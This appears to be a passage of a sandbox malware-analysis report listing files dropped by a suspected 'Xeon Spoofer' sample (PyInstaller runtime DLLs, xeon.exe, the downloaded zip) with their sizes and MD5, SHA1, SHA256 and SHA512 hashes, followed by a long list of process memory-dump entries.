6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50802\python313.dll

Filesize
5.8MB

MD5
b9de917b925dd246b709bb4233777efd

SHA1
775f258d8b530c6ea9f0dd3d1d0b61c1948c25d2

SHA256
0c0a66505093b6a4bb3475f716bd3d9552095776f6a124709c13b3f9552c7d99

SHA512
f4bf3398f50fdd3ab7e3f02c1f940b4c8b5650ed7af16c626ccd1b934053ba73a35f96da03b349c1eb614bb23e0bc6b5cc58b07b7553a5c93c6d23124f324a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50802\select.pyd

Filesize
30KB

MD5
20831703486869b470006941b4d996f2

SHA1
28851dfd43706542cd3ef1b88b5e2749562dfee0

SHA256
78e5994c29d8851f28b5b12d59d742d876683aea58eceea1fb895b2036cdcdeb

SHA512
4aaf5d66d2b73f939b9a91e7eddfeb2ce2476c625586ef227b312230414c064aa850b02a4028363aa4664408c9510594754530a6d026a0a84be0168d677c1bc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50802\tcl86t.dll

Filesize
1.7MB

MD5
8587238932b4f7f394ce587ad169846b

SHA1
6cdc9c1751e812be3a11bb411a145e7ab6885def

SHA256
c861f39ad0f4fc7f3875850925f61442bff2bc1839bbbb3584a63bc4d6e5cea6

SHA512
c88506e5b78ab1459c25de4c7ef65b3c9e24e0f79ab2132e8fdc7a02195af2e137874512a0f423c80d558969e42e2a4bc7d2cddee696624dbd230b32c44f88f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50802\tk86t.dll

Filesize
1.5MB

MD5
6f06390d3ac095827df2f1a8ed5dae0c

SHA1
879f24522821f597c0341ca091e474163764b343

SHA256
6425bf57abcc1dfbbe8662b1956883ae0c5ab8c2d9314e19692b3d86babc242c

SHA512
27b975e15f6e1b9bc8e3e41152baee25f4b400de3aa6e334c61b2165fecd27560fa5c4296a9b3ff0eb1103173cfb61c348ba11e01a44cbadbecf308b5d7c5095

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50802\unicodedata.pyd

Filesize
693KB

MD5
0902d299a2a487a7b0c2d75862b13640

SHA1
04bcbd5a11861a03a0d323a8050a677c3a88be13

SHA256
2693c7ee4fba55dc548f641c0cb94485d0e18596ffef16541bd43a5104c28b20

SHA512
8cbef5a9f2d24da1014f8f1ccbddd997a084a0b04dd56bcb6ac38ddb636d05ef7e4ea7f67a085363aad3f43d45413914e55bdef14a662e80be955e6dfc2feca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50802\zlib1.dll

Filesize
142KB

MD5
3a46a119c9860c477f13fe98c878452c

SHA1
e0bcbe5b30ef2a2f58e1206c650672ee3f85abc9

SHA256
8c2ed3e1a90c9b0e3ef844be20e1af791ae8a1b665d4731162404f0eee1697dc

SHA512
0d3d4e8a2c8886fd6e480aecc5051644f39c1e06b1113def7273369f771c4429c757aed13bd8082f4768f617ca3499cd81b79a0893b5a2955fb4b68c8b571c71

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v5n3ursb.qly.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xeon.exe

Filesize
10.0MB

MD5
a177c872df5ec429527170792786819e

SHA1
5ee56b57d21feb3de17c7a2af14a51bdeea2a661

SHA256
c4965609e4bf3ce7278b22d410a61b1f151cae08217cd47a27a0da15e89a6289

SHA512
d0409a3106f8b9dba0e73a1514947fbc5bd2ac6713779643c43692d4b772f10902b6a91e6540f531f38b1c1ebd41e0cba19f3844a994d8ac15f95dab65f439ab

Download Submit
C:\Users\Admin\Downloads\XeonSpooferV1.zip

Filesize
38.5MB

MD5
674f5ef78a74d51cadf465f09260066e

SHA1
640dc20e8f377c50f786240d8d48291e64d6bb74

SHA256
7392c3516b6afbfa255ea9f28e590227e90ca3bcae4fda8b46f076ad7128d166

SHA512
503c62c317eac6de75f0da372c8ab0f2b2edec3c07ffe76a3168030cbfd0237b7e9141e153fd2a3ef04731f5680a22ce959f769dfcab149428efa5ba5e8f2c61

Download Submit
C:\Users\Admin\Downloads\XeonSpooferV1.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
memory/648-1555-0x000001D9FA0B0000-0x000001D9FA0DB000-memory.dmp

Filesize
172KB

Download
memory/648-1554-0x000001D9FA0B0000-0x000001D9FA0DB000-memory.dmp

Filesize
172KB

Download
memory/648-1553-0x000001D9FA080000-0x000001D9FA0A5000-memory.dmp

Filesize
148KB

Download
memory/1192-1518-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1192-1517-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1192-1532-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1192-1519-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1192-1520-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1192-1521-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1980-1470-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1980-1475-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1980-1471-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1980-1473-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1980-1472-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2416-1527-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1535-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1525-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1529-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1537-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1538-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1536-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1534-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1524-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1531-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1533-0x0000016319730000-0x0000016319750000-memory.dmp

Filesize
128KB

Download
memory/2416-1530-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2416-1528-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2452-1467-0x000002A7210D0000-0x000002A7210F2000-memory.dmp

Filesize
136KB

Download
memory/3704-1548-0x00007FFAA4440000-0x00007FFAA4649000-memory.dmp

Filesize
2.0MB

Download
memory/3704-1549-0x00007FFAA3940000-0x00007FFAA39FD000-memory.dmp

Filesize
756KB

Download
memory/3704-1543-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3704-1542-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3704-1550-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3704-1547-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3704-1545-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3704-1544-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5612-1539-0x000002AAFA620000-0x000002AAFA64A000-memory.dmp

Filesize
168KB

Download
memory/5612-1541-0x00007FFAA3940000-0x00007FFAA39FD000-memory.dmp

Filesize
756KB

Download
memory/5612-1540-0x00007FFAA4440000-0x00007FFAA4649000-memory.dmp

Filesize
2.0MB

Download
memory/5744-426-0x0000000005720000-0x0000000005742000-memory.dmp

Filesize
136KB

Download
memory/5744-1426-0x0000000074550000-0x000000007459C000-memory.dmp

Filesize
304KB

Download
memory/5744-419-0x0000000003100000-0x0000000003136000-memory.dmp

Filesize
216KB

Download
memory/5744-420-0x0000000005A10000-0x000000000603A000-memory.dmp

Filesize
6.2MB

Download
memory/5744-433-0x00000000060B0000-0x0000000006116000-memory.dmp

Filesize
408KB

Download
memory/5744-428-0x0000000006040000-0x00000000060A6000-memory.dmp

Filesize
408KB

Download
memory/5744-557-0x0000000006120000-0x0000000006477000-memory.dmp

Filesize
3.3MB

Download
memory/5744-894-0x00000000065B0000-0x00000000065CE000-memory.dmp

Filesize
120KB

Download
memory/5744-895-0x00000000065F0000-0x000000000663C000-memory.dmp

Filesize
304KB

Download
memory/5744-1425-0x00000000077B0000-0x00000000077E4000-memory.dmp

Filesize
208KB

Download
memory/5744-1435-0x0000000006BA0000-0x0000000006BBE000-memory.dmp

Filesize
120KB

Download
memory/5744-1445-0x0000000007C40000-0x0000000007C48000-memory.dmp

Filesize
32KB

Download
memory/5744-1444-0x0000000007C50000-0x0000000007C6A000-memory.dmp

Filesize
104KB

Download
memory/5744-1443-0x0000000007B60000-0x0000000007B75000-memory.dmp

Filesize
84KB

Download
memory/5744-1442-0x0000000007B50000-0x0000000007B5E000-memory.dmp

Filesize
56KB

Download
memory/5744-1441-0x0000000007B10000-0x0000000007B21000-memory.dmp

Filesize
68KB

Download
memory/5744-1440-0x0000000007B90000-0x0000000007C26000-memory.dmp

Filesize
600KB

Download
memory/5744-1439-0x0000000007990000-0x000000000799A000-memory.dmp

Filesize
40KB

Download
memory/5744-1437-0x0000000007F50000-0x00000000085CA000-memory.dmp

Filesize
6.5MB

Download
memory/5744-1438-0x0000000007900000-0x000000000791A000-memory.dmp

Filesize
104KB

Download
memory/5744-1436-0x00000000077F0000-0x0000000007894000-memory.dmp

Filesize
656KB

Download
memory/5852-1509-0x000001866AB30000-0x000001866AB3A000-memory.dmp

Filesize
40KB

Download
memory/5852-1501-0x000001866A8F0000-0x000001866A90C000-memory.dmp

Filesize
112KB

Download
memory/5852-1502-0x000001866A910000-0x000001866A9C3000-memory.dmp

Filesize
716KB

Download
memory/5852-1503-0x000001866A9D0000-0x000001866A9DA000-memory.dmp

Filesize
40KB

Download
memory/5852-1504-0x000001866AA00000-0x000001866AA1C000-memory.dmp

Filesize
112KB

Download
memory/5852-1505-0x000001866A9E0000-0x000001866A9EA000-memory.dmp

Filesize
40KB

Download
memory/5852-1506-0x000001866AB40000-0x000001866AB5A000-memory.dmp

Filesize
104KB

Download
memory/5852-1507-0x000001866A9F0000-0x000001866A9F8000-memory.dmp

Filesize
32KB

Download
memory/5852-1508-0x000001866AB20000-0x000001866AB26000-memory.dmp

Filesize
24KB

Download
memory/5976-1448-0x00007FFA947D0000-0x00007FFA947F9000-memory.dmp

Filesize
164KB

Download